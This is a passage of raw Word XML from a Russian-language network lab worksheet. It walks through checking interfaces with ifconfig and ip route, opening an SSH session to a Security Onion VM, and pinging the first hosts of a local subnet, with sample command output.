        <w:t>235  Bcast</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:209.165.200.255  Mask:255.255.255.224</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06869C59" w14:textId="77777777" w:rsidR="008855F4" w:rsidRPr="008855F4" w:rsidRDefault="008855F4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 xml:space="preserve">          inet6 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: fe</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>80::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">a00:27ff:feab:8407/64 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scope:Link</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7528A578" w14:textId="77777777" w:rsidR="008855F4" w:rsidRPr="008855F4" w:rsidRDefault="008855F4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 xml:space="preserve">          UP BROADCAST RUNNING </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MULTICAST  MTU</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:1500  Metric:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3360F411" w14:textId="77777777" w:rsidR="008855F4" w:rsidRPr="008855F4" w:rsidRDefault="008855F4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 xml:space="preserve">          RX packets:1610 errors:0 dropped:0 overruns:0 frame:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297FF33D" w14:textId="77777777" w:rsidR="008855F4" w:rsidRPr="008855F4" w:rsidRDefault="008855F4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 xml:space="preserve">          TX packets:1550 errors:0 dropped:0 overruns:0 carrier:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA33471" w14:textId="77777777" w:rsidR="008855F4" w:rsidRPr="008855F4" w:rsidRDefault="008855F4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 xml:space="preserve">          collisions:0 txqueuelen:1000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1F9F42" w14:textId="77777777" w:rsidR="008855F4" w:rsidRPr="008855F4" w:rsidRDefault="008855F4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 xml:space="preserve">          RX bytes:117030 (114.2 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>KB)  TX</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> bytes:123570 (120.6 KB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D07C490" w14:textId="342D500A" w:rsidR="00A258CE" w:rsidRPr="008855F4" w:rsidRDefault="008855F4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 xml:space="preserve">          Interrupt:10 Base address:0xd020</w:t>
      </w:r>
      <w:r w:rsidR="00A258CE" w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E719678" w14:textId="7E5A7A9C" w:rsidR="00A258CE" w:rsidRPr="008855F4" w:rsidRDefault="00A258CE" w:rsidP="0042041D">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:spacing w:line="238" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;output omitted&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A670F4" w14:textId="5C058A66" w:rsidR="00A258CE" w:rsidRPr="00BB3BE1" w:rsidRDefault="00A258CE" w:rsidP="0042041D">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:spacing w:line="238" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Введите команду </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ip route</w:t>
      </w:r>
      <w:r>
        <w:t>, чтобы определить шлюз по умолчанию для этой сети.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A48280A" w14:textId="0FF25FA6" w:rsidR="00A258CE" w:rsidRPr="008855F4" w:rsidRDefault="00A258CE" w:rsidP="0042041D">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:spacing w:line="238" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>analyst@metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">:~$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2414B33F" w14:textId="77777777" w:rsidR="008855F4" w:rsidRPr="008855F4" w:rsidRDefault="008855F4" w:rsidP="0042041D">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:spacing w:line="238" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>209.165.200.224/27 dev eth</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0  proto</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> kernel  scope link  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 209.165.200.235</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2147F55E" w14:textId="492D4D28" w:rsidR="00F148C1" w:rsidRPr="008855F4" w:rsidRDefault="008855F4" w:rsidP="0042041D">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:spacing w:line="238" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00163A56">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">default via </w:t>
      </w:r>
      <w:r w:rsidRPr="00163A56">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>209.165.200.226</w:t>
      </w:r>
      <w:r w:rsidRPr="00163A56">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> dev eth0  metric 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55445801" w14:textId="718BF521" w:rsidR="00DB6F26" w:rsidRDefault="00DB6F26" w:rsidP="0042041D">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:spacing w:line="238" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Каков адрес шлюза по умолчанию?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B4F6F6" w14:textId="7525E841" w:rsidR="00DB6F26" w:rsidRDefault="00DB6F26" w:rsidP="0042041D">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:spacing w:line="238" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>____________________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04982175" w14:textId="3E3A96A4" w:rsidR="00A258CE" w:rsidRDefault="00A258CE" w:rsidP="0042041D">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:spacing w:line="238" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>В этом же окне терминала установите другой сеанс SSH</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">виртуальной машиной Security Onion по адресу 209.165.200.226 (интерфейс eth1) от имени пользователя </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB6F26">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>analyst</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Введите </w:t>
      </w:r>
      <w:r w:rsidR="003B54AC" w:rsidRPr="00F27B94">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (да), чтобы принять цифровую подпись RSA при первом подключении. Подключение может занять несколько минут. При появлении соответствующего запроса введите пароль </w:t>
      </w:r>
      <w:r w:rsidRPr="008E3B21">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cyberops</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4292263A" w14:textId="68A90378" w:rsidR="00114F04" w:rsidRDefault="00114F04" w:rsidP="0042041D">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:spacing w:line="238" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">analyst@metasploitable:~$ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ssh </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="00500A49" w:rsidRPr="00132227">
          <w:rPr>
            <w:rStyle w:val="afd"/>
            <w:b/>
          </w:rPr>
          <w:t>analyst@209.165.200.226</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="354ADD6B" w14:textId="563397A8" w:rsidR="00500A49" w:rsidRPr="00DB6F26" w:rsidRDefault="00500A49" w:rsidP="0042041D">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:spacing w:line="238" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00500A49">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="144DF13C" wp14:editId="6BF6E579">
            <wp:extent cx="6400800" cy="2097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3E60" w14:textId="75D9B12D" w:rsidR="00A258CE" w:rsidRDefault="00A258CE" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Введите </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ifconfig </w:t>
      </w:r>
      <w:r>
        <w:t>, чтобы просмотреть список сетевых интерфейсов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8DBD8A" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="008855F4" w:rsidRDefault="00A258CE" w:rsidP="00A258CE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analyst@SecOnion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">:~$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="084CAD42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eth0      Link </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>encap:Ethernet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HWaddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 08:00:27:c3:cd:8c  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009F819D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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>inet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> addr:192.168.0.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1  Bcast</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:192.168.0.255  Mask:255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023C2633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inet6 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: fe</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>80::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">a00:27ff:fec3:cd8c/64 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scope:Link</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="589234EA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UP BROADCAST RUNNING PROMISC </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MULTICAST  MTU</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:1500  Metric:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C04D7CC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RX packets:8 errors:0 dropped:0 overruns:0 frame:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D79615" w14:textId="77777777" w:rsidR="008855F4" w:rsidRPr="008855F4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TX packets:64 errors:0 dropped:0 overruns:0 carrier:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A58FE6" w14:textId="77777777" w:rsidR="008855F4" w:rsidRPr="00D12943" w:rsidRDefault="008855F4" w:rsidP="008855F4">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="00D12943">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">collisions:0 txqueuelen:1000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4526719E" w14:textId="6F8E5673" w:rsidR="00A258CE" w:rsidRPr="00D12943" w:rsidRDefault="008855F4" w:rsidP="008855F4">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D12943">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">          RX bytes:656 (656.0 B)  TX bytes:9377 (9.3 KB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE1A026" w14:textId="79CE4824" w:rsidR="00A258CE" w:rsidRDefault="00A258CE" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;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omitted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B29093" w14:textId="1A4AE254" w:rsidR="00500A49" w:rsidRDefault="00C43A3B" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
      </w:pPr>
      <w:r w:rsidRPr="00C43A3B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45D974C6" wp14:editId="398695B9">
            <wp:extent cx="6400800" cy="1589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C544" w14:textId="63E19250" w:rsidR="00A258CE" w:rsidRDefault="00A258CE" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Для данной локальной сети вы определили подсеть 192.168.0.0/24. Теперь вы будете использовать цикл </w:t>
      </w:r>
      <w:r w:rsidRPr="003E2E90">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для определения активных хостов</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>этой локальной сети. Для того чтобы сэкономить время, вы будет отправлять эхозапрос только на первые 15 узлов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A1BE76" w14:textId="7046A55A" w:rsidR="00A258CE" w:rsidRPr="008855F4" w:rsidRDefault="00A258CE" w:rsidP="00A258CE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analyst@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SecOnion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for ((</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=1;i&lt;15;i+=1)); do ping -c</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7" w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>192.168.0.$i; done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531478E7" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="008855F4" w:rsidRDefault="00A258CE" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PING 192.168.0.1 (192.168.0.1) 56(84) bytes of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536F0D0F" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="008855F4" w:rsidRDefault="00A258CE" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">64 bytes from 192.168.0.1: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>icmp_seq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">=1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ttl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">=64 time=0.067 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6654DBCD" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="008855F4" w:rsidRDefault="00A258CE" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">64 bytes from 192.168.0.1: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>icmp_seq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">=2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ttl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">=64 time=0.027 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="60814221" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="008855F4" w:rsidRDefault="00A258CE" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--- 192.168.0.1 ping statistics ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D2D317" w14:textId="113FC463" w:rsidR="00A258CE" w:rsidRPr="008855F4" w:rsidRDefault="00A258CE" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2 packets transmitted,</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7" w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>received, 0% packet loss, time 999ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F8F0CD" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="008855F4" w:rsidRDefault="00A258CE" w:rsidP="00A258CE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rtt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> min/avg/max/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mdev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0.028/0.031/0.034/0.003 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="743A9AF9" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="008855F4" w:rsidRDefault="00A258CE" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
